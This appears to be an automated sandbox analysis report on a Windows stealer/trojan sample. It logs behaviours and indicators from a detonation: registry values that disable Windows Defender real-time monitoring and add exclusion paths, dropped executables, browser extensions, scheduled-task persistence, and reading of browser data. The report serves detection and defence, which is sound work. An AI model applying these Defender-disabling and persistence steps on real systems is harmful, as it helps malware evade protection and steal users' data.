Malware Analysis Report

2024-09-11 13:01

Sample ID 240613-2v1rhsxgjk
Target 54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112
SHA256 54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112
Tags
discovery evasion execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112

Threat Level: Known bad

The file 54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112 was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Drops Chrome extension

Checks installed software on the system

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-13 22:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 22:54

Reported

2024-06-13 23:00

Platform

win7-20240508-en

Max time kernel

201s

Max time network

202s

Command Line

"C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prAQyJMeU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zNBDoCPwUgCU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oGdIbQIKIHUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oGdIbQIKIHUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zNBDoCPwUgCU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wpmocubwzvTKZWVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hkBthRLftwjEC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hkBthRLftwjEC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wpmocubwzvTKZWVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prAQyJMeU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\ixxtvyh.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\NXJkYLDWQlAfW.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\phSNGcp.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\rgNvluu.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\oGdIbQIKIHUn\eXftgfB.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\HAWbSXq.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\BbPXxNf.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\XQOcubk.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\XkLWlf.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bcicWGWSPuqTxjDSpV.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\emrEEeoVdUigmulhl.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\rbzCIowvsKWRrhO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\EXxaHtUqjXkXqVrbU.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 804e27c2e4bdda01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadNetworkName = "Network 3" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\32-a7-9c-5d-1a-03 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5} C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 80c17aece4bdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadNetworkName = "Network 3" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
